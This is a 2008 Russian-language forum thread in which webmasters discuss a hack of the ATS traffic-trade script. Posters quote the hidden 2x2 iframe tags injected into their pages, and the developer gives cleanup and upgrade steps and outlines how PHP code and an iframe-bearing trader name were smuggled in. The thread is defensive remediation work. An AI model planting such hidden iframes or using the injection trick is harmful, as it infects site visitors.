Друзья давайте общаться чаще.
С нами с 05.02.05
Сообщения: 2981
Рейтинг: 1517
|
 Добавлено: 07/11/08 в 16:45 |
файлы установок (/settings/*.php)
|
|
|
|
| |
С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440
|
| Добавлено: 07/11/08 в 18:57 |
мне тут человек на армаде написал что в скрипте был закодирован сайт
| Код: | <iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe> |
это так? чей сидж? мож на него написать чего нехорошего?
|
|
|
|
| |
С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016
|
| Добавлено: 07/11/08 в 19:09 |
| Gidz писал: | мне тут человек на армаде написал что в скрипте был закодирован сайт
| Код: | <iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe> |
это так? чей сидж? мож на него написать чего нехорошего? |
Опа-на. Известный человек на AskDamage под ником Best-in-BC
Попробую отписать там.
|
|
|
|
| |
С нами с 15.11.07
Сообщения: 317
Рейтинг: 274
|
| Добавлено: 07/11/08 в 19:43 |
времени мало, спешил всё сделать, но забыл расшифровать пароль перед заменой.
В итоге не проходит пароль.
может кто сталкивался, знает как заменить/обнулить/ищё чего нибудь?
|
|
|
|
| |
С нами с 28.07.06
Сообщения: 19
Рейтинг: 2
|
| Добавлено: 07/11/08 в 20:32 |
На нашем серваке были убиты все php файлы. Пришлось попотеть что бы все восстановить.
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 07/11/08 в 20:38 |
| SamsonS писал: | времени мало, спешил всё сделать, но забыл расшифровать пароль перед заменой.
В итоге не проходит пароль.
может кто сталкивался, знает как заменить/обнулить/ищё чего нибудь? |
в файле si.php меняем $a_login="логин", $a_password="пароль", $secured="0" заливаем файл обатно и входим в админку.
|
|
|
|
| |
С нами с 26.04.06
Сообщения: 107
Рейтинг: 114
|
| Добавлено: 07/11/08 в 20:56 |
| Gidz писал: | мне тут человек на армаде написал что в скрипте был закодирован сайт
| Код: | <iframe src="http://www.celebritynympho.com/st/niches/z/static.
php" height="2" style="display:none" width="2"></iframe> |
это так? чей сидж? мож на него написать чего нехорошего? |
А у меня было вот это
| Код: | | <iframe src="http://www.porngalleriesz.com/st/z/static.php" height="2" style="display:none" width="2"></iframe> |
Возможно это в свою очередь ранее взломаные сиджы.
|
|
|
|
| |
С нами с 25.09.04
Сообщения: 485
Рейтинг: 514
|
| Добавлено: 07/11/08 в 21:57 |
Закодированные в коде сиджи однозначно взломанные и используются для вставки говна через ифрейм. Так что утверждать что владельцы этих сиджев и есть уроды ошибочно!
пысы: один из моих сиджев как-то побывал в такой шкуре, кто-то понял ситуацию, ну, а кто-то (несколько тупых пендосов) тупо забанили навечно 
|
|
|
|
| |
С нами с 15.11.07
Сообщения: 317
Рейтинг: 274
|
| Добавлено: 07/11/08 в 22:00 |
| von Stoltz писал: | | в файле si.php меняем $a_login="логин", $a_password="пароль", $secured="0" заливаем файл обатно и входим в админку. |
СЕНКС!!! всё отлично поменял 
- а что делать с subrules.txt?
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 07/11/08 в 23:39 |
Итак добро пожаловать за апгрейдом на ats-project.com
Вот несколько общих рекомендаций.
Если сайт не взломан:
1. убедиться, что на корневую папку установлены права не выше 755;
2. Проапгрейдить до 1.7.2 путем замены файлов;
3. Зашифровать пароль;
4. Для спокойного сна поставить права 444 на файлы /datafiles/rules.txt, datafiles/subrules.txt, templates/*.tpl, чтобы менять темплейты и правила из админки придется временно вернуть права 777.
Если уже поломали:
1. убедиться, что на корневую папку установлены права не выше 755;
2. удалить все php файлы, которые не похожи на файлы АТС (они могут быть в папках);
3. удалить файлы /datafiles/rules.txt, datafiles/subrules.txt;
4. Проапгрейдить до 1.7.2 путем замены файлов;
5. Вычистить темплейты (можно из админки);
6. создать заново правила для трейдеров Settings - Trade Rules;
7. Зашифровать пароль;
8. Для спокойного сна поставить права 444 на файлы /datafiles/rules.txt, datafiles/subrules.txt, templates/*.tpl, чтобы менять темплейты и правила из админки придется вернуть права 777.
|
|
|
|
| |
С нами с 15.11.07
Сообщения: 317
Рейтинг: 274
|
| Добавлено: 08/11/08 в 00:25 |
как насчет апдейта для 1.6.3 ?
|
|
|
|
| |
С нами с 01.03.04
Сообщения: 682
Рейтинг: 640
|
| Добавлено: 08/11/08 в 00:33 |
тоже интересно
|
|
|
|
| |
С нами с 03.04.03
Сообщения: 2464
Рейтинг: 1841
|
| Добавлено: 08/11/08 в 00:46 |
тож интересно про 1.6.3
и также вопрос про апдэйт. версии 1.7 апдэйтить сразу можно на 1.7.2 рпостым перезалитием файлов?
|
|
|
|
| |
С нами с 01.03.04
Сообщения: 682
Рейтинг: 640
|
| Добавлено: 08/11/08 в 03:43 |
наверно да - просто перезалить...но!
у меня например файлы ротатора поверх скрипта стоят в 1.6.3
кстати как правильно то? у кого как?
но если сначала ротатор поставить а потом скрипт то тоже работает
хотя я ставил сначала скрипт потом ротатор
|
|
|
|
| |
😈😈😈
С нами с 17.08.05
Сообщения: 3966
Рейтинг: 5534
|
| Добавлено: 08/11/08 в 07:47 |
| miroz писал: | Опа-на. Известный человек на AskDamage под ником Best-in-BC
Попробую отписать там. |
он тоже заломан . юзают зараженные домены , как балк хосты для следующих заражений =|
тот же хакер короче , или бригада , что и ат3-атх ломали .
|
|
|
|
Diablo.Click - T1 ским трафик напрямую с тубов от 0.5$ за кил
|
0
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 08/11/08 в 09:38 |
Для 1.6.3 апдейт будет немного позже, апдейт 1.7 -> 1.7.2 тоже делается простой заменой файлов.
|
|
|
|
| |
+
сам дебил
С нами с 25.07.06
Сообщения: 5379
Рейтинг: 1822
|
| Добавлено: 08/11/08 в 10:27 |
лучше отпишите хозяевам этих доменов пускай эти файлы потрут
|
|
|
|
| |
♥♥♥
С нами с 28.08.04
Сообщения: 7098
Рейтинг: 5671
|
| Добавлено: 08/11/08 в 14:58 |
проапдейтился нормально
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 08/11/08 в 23:41 |
|
|
|
|
| |
С нами с 16.04.08
Сообщения: 124
Рейтинг: 51
|
| Добавлено: 09/11/08 в 04:18 |
обновил файлы АТСа заплатками - код продолжает появляться. Почистил темплаты. Поставил права 555 на файлы и корневой каталог..
Может где-то я его не нашёл и он себя репродуцирует с каждой отработкой крона или ещё хз как..
Может я не соблюдаю очерёдность правильную ??
И когда ставлю Secured на пароль - потом не могу зайти в админку.
приходиться обновлять пасс заменой si.php
в чём может быть фишка?
Никак не могу одолеть эту хрень (((
|
|
|
|
| |
С нами с 29.09.04
Сообщения: 329
Рейтинг: 120
|
| Добавлено: 09/11/08 в 06:19 |
| Burn писал: | | обновил файлы АТСа заплатками - код продолжает появляться. |
Так видимо в обновлении пофиксили баг, тоесть не получится таким образом взломать теперь. А если какашка уже сидит на серваке, почистить надо, там выше Soft-Com писал как.
|
|
|
|
| |
С нами с 16.04.08
Сообщения: 124
Рейтинг: 51
|
| Добавлено: 09/11/08 в 06:39 |
код больше не появляется - вроде почистил.
Топ лист отображается - нашёл причину.
Вот на счёт установки секьюрности паролю у меня до сих пор вопросы..
Устанавливаю секьюрность - не могу залогиниться.
подскажите где искать причину этого, плз.
|
|
|
|
| |
С нами с 08.04.08
Сообщения: 26
Рейтинг: 18
|
| Добавлено: 09/11/08 в 07:58 |
| Цитата: | | удалить все php файлы, которые не похожи на файлы АТС |
А какие файлы непохожи?
/settings
si
os
ms
mi
is
if
cm
ca
bg
|
|
|
|
| |
С нами с 16.12.06
Сообщения: 1489
Рейтинг: 583
|
| Добавлено: 09/11/08 в 11:28 |
| sllimm писал: | А какие файлы непохожи?
/settings
si
os
ms
mi
is
if
cm
ca
bg |
mi, bg лишнии
|
|
|
|
| |
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
| Добавлено: 09/11/08 в 14:26 |
| Burn писал: |
Вот на счёт установки секьюрности паролю у меня до сих пор вопросы..
Устанавливаю секьюрность - не могу залогиниться.
подскажите где искать причину этого, плз. |
Чтобы зашифровать пароль на файл settings/si.php должны быть права 666 или выше, после шифрования права можно уменьшить.
Как я понимаю механизм взлома, права на файлы установок особой роли не играли, критичной оказалась возможность записи в rules.txt пхп кода, а также добавление трейдера с хитрожопым названием, содержащим вызов ифрейма.
В новой версии, все эти фокусы не пройдут. Но пароль в открытом виде держать все равно не рекомендуется, а также желательно исключить возможность записи в темплейты после их создания, это, кстати относится не только к АТС, но всем скриптам ротаторов.
Необычные пхп файлы - все, отличающиеся от стандартных АТС в корне, а также в папках, где пхп файлов быть не должно: /ipfiles, /logfiles, /tradefiles
|
|
|
|
| |
